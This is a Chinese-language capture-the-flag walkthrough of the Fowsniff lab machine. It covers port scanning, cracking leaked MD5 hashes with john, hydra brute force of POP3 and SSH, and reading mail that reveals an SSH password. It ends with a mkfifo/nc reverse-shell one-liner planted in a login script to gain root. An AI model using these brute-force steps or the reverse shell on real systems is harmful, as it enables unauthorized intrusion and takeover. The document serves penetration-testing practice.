靶机下载地址

信息收集

主机发现

nmap 192.168.31.0/24 -Pn -T4

靶机ip：192.168.31.134

端口扫描

nmap 192.168.31.134 -A -p- -T4

开放端口22(ssh)、80(http)，和两个明文传输的邮件端口110(pop3)、143(imap)。

HTTP

访问http://192.168.31.134。

目录扫描。

dirsearch -u http://192.168.31.134

扫描出不少目录。

访问/security.txt，1337语言加密。1337(Leet)一种黑客语言，通常将英语中的字母替换为数字和特殊符号。

一个破解1337的简单python脚本。

str1 = input()
before = '0134567'
after = 'oieasgt'
table = ''.maketrans(before, after)     #创建映射表
print(str1.translate(table))

Fowsniff Corp被BigNinja入侵了！完全没用。

首页的下滑有一些文字，通过文字翻译知道Fowsniff的内部系统遭遇数据泄露，导致员工用户名和密码暴露，所有员工被指示立即更改密码。攻击者还劫持了官方@fowsniffcorp Twitter账户。

推特账户，用谷歌搜索，第一个就是。

置顶帖子的链接中给出了黑客获取的密码，不过链接404了。

在网上的wp中找到了链接中的内容。

以下是他们从数据库中获取的电子邮件密码。
​
他们的pop 3服务器也完全打开了！
​
MD5不安全，所以破解它们应该不难。
​
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e 

黑客dump的pop3邮件账户和密码，提示密码由MD5加密，找个网站解一下或者john破解。

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt lists.txt

# 查看
john --show --format=Raw-MD5 lists.txt

 

复制到pop3.txt中，用awk命令将用户名和密码分别存入username.txt和password.txt中方便后续使用。

cat pop3.txt | awk -F '@' '{print $1}' > username.txt
cat pop3.txt | awk -F ':' '{print $2}' > password.txt

渗透

爆破邮箱协议POP3

hydra -L username.txt -P password.txt pop3://192.168.31.134

seina:scoobydoo2

telnet登录POP3。

telnet ip port
user seina
pass scoobydoo2
# 列出所有邮件编码和长度
list
# 读取指定邮件 
retr 邮件编号
# 退出
quit

有两封邮件，邮件1内容如下：

Dear All,

A few days ago, a malicious actor was able to gain entry to our internal email systems. The attacker was able to exploit incorrectly filtered escape characters within our SQL database to access our login credentials. Both the SQL and authentication system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system overhaul. While the main systems are "in the shop," we have moved to this isolated, temporary server that has minimal functionality.

This server is capable of sending and receiving emails, but only locally. That means you can only send emails to other users, not to the world wide web. You can, however, access this system via the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my guidance. I saw the leak the attacker posted online, and I must say that your passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks, A.J Stone

大概内容是通知员工用SSH的临时密码S1ck3nBluff+secureshell登录，然后修改密码。

第二封邮件内容如下：大概是Skyler跟离开了一周的Devin的闲聊。

Devin,

You should have seen the brass lay into AJ today! We are going to be talking about this one for a looooong time hahaha. Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with you from your camping trip, but I think I'm coming down with it myself. How long have you been gone - a week? Next time you're going to get sick and miss the managerial blowout of the century, at least keep it to yourself!

I'm going to head home early and eat some chicken soup. I think I just got an email from Stone, too, but it's probably just some "Let me explain the tone of my meeting with management" face-saving mail. I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password. AJ had been telling us to do that right before Captain Profanity showed up.

爆破ssh

看看谁没修改密码，大概率是离开一周的Devin对应账户baksteen。

hydra -L username.txt -p S1ck3nBluff+secureshell ssh://192.168.31.134

baksteen:S1ck3nBluff+secureshell

远程登录ssh服务器。找到一条提示："One Hit Wonder"，昙花一现的歌手，不知道什么意思。

提权

内核提权uname -a

用44298。上传到靶机，发现靶机没有gcc无法编译exp，在本机上编译好试试，结果提示./44298: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./44298)。由此整个内核提权out！

看了wp知道需要找有写权限的文件。

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*"  2>/dev/null

最可疑的就是/opt/cube/cube.sh。

执行cube.sh会打印如下内容，这个页面是ssh连接成功时出现的页面，说明每次进行ssh连接成功时都会执行这个文件。

写入反弹shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.121 4444 >/tmp/f

退出baksteen终端，攻击机nc监听4444端口，重新登录ssh。

get flag.txt!🎆